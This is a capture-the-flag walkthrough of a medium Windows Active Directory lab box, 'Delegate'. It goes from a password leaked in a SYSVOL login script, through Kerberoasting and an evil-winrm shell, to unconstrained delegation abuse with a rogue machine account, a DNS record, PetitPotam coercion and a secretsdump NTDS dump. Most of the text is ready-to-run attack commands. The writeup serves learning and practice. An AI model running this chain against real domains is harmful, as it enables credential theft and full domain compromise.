Skip to main content

Machine (Medium) - Delegate

Writeup for the Delegate machine, a medium-difficulty Windows Active Directory box by geiseric. The path involves extracting credentials from login scripts, escalating via user delegation rights, and abusing unconstrained delegation through DNS and UAC flags to impersonate the Domain Controller and dump the NTDS database.

Writeup Author: BobBuilder

Objective: Escalate from a leaked login script credential to full domain compromise using delegation and coercion techniques.

Category Difficulty Platform Machine Author
Machine Medium Windows geiseric

User

Step 1: Enumerate SPNs and SMB Shares

We first attempt to enumerate SPNs:

impacket-GetUserSPNs -target-domain delegate.vl -usersfile users_delegate.vl.txt -dc-ip <delegate_ip> delegate.vl/guest:'' -no-pass

We then enumerate SMB shares:

nxc smb <delegate_ip> -u guest -p '' -M spider_plus -o DOWNLOAD_FLAG=true

Step 2: Discover Credentials in SYSVOL Login Script

From SYSVOL:

sysvol/delegate.vl/scripts/users.bat

The batch script contains hardcoded credentials for user A.Briggs:

net use h: \\fileserver\backups /user:Administrator [REDACTED_PASSWORD_1]

Using the recovered password, we validate accounts:

nxc smb <delegate_ip> -u users_delegate.vl.txt -p '[REDACTED_PASSWORD_1]' --shares --continue-on-success

Valid credentials:

A.Briggs:[REDACTED_PASSWORD_1]

Step 3: BloodHound Analysis – A.Briggs Has GenericWrite

User A.Briggs has GenericWrite over user N.Thompson, who is a member of:

  • Remote Management Users
  • Delegation Admins

Step 4: Attempt Shadow Credentials Attack (Fails)

Tried using Shadow Credentials:

bloodyAD.py --host <delegate_ip> -d delegate.vl -u 'A.Briggs' -p '[REDACTED_PASSWORD_1]' add shadowCredentials n.thompson

Fails due to PKInit being unsupported.

Step 5: Kerberoasting N.Thompson

We request a ticket for N.Thompson:

targetedKerberoast.py -u 'A.Briggs' -p '[REDACTED_PASSWORD_1]' --request-user N.Thompson -d delegate.vl

Crack with hashcat:

hashcat -m 13100 hashes.txt custom_wordlist.txt

Recovered credentials:

N.Thompson:[REDACTED_PASSWORD_2]

Step 6: Shell Access with Evil-WinRM

evil-winrm -i delegate.vl -u 'N.Thompson' -p '[REDACTED_PASSWORD_2]'

Root

Step 1: Check Privileges

whoami /all

N.Thompson has:

  • SeEnableDelegationPrivilege
  • SeMachineAccountPrivilege

Step 2: Create New Computer for Delegation Abuse

addcomputer delegate.vl/N.Thompson:'[REDACTED_PASSWORD_2]' -computer-name newpc1 -computer-pass password1 -dc-host dc1.delegate.vl

Step 3: Add DNS Record Pointing to Attacker

dnstool.py -u 'delegate.vl\newpc1$' -p password1 -r newpc1.delegate.vl -d <attacker_ip> --action add -dns-ip <delegate_ip> dc1.delegate.vl
nslookup newpc1.delegate.vl <delegate_ip>

Step 4: Configure Delegation Flags and SPN

Add TRUSTED_FOR_DELEGATION flag:

bloodyAD.py --host <delegate_ip> -d delegate.vl -u 'N.Thompson' -p '[REDACTED_PASSWORD_2]' add uac 'newpc1$' -f TRUSTED_FOR_DELEGATION

Add SPN:

addspn.py -u 'delegate.vl\N.Thompson' -p '[REDACTED_PASSWORD_2]' -t 'newpc1$' -s 'CIFS/newpc1$.delegate.vl' -a delegate.vl

Verify with PowerView:

powerview.py delegate.vl/N.Thompson:'[REDACTED_PASSWORD_2]'@<delegate_ip> --use-ldap
# PV > Get-DomainComputer -Properties servicePrincipalName

Step 5: Coerce Authentication via PetitPotam

Set up krbrelay:

krbrelayx.py --krbsalt 'delegate.vl\newpc1$' --krbpass password1 -dc-ip <delegate_ip> -v dc1

Trigger coercion:

PetitPotam.py -u 'N.Thompson' -p '[REDACTED_PASSWORD_2]' -d delegate.vl 'newpc1.delegate.vl' dc1.delegate.vl

Step 6: Dump Domain Hashes with Delegated Ticket

Use the delegated ticket:

export KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'
secretsdump.py -just-dc dc1.delegate.vl -k -no-pass
Back to top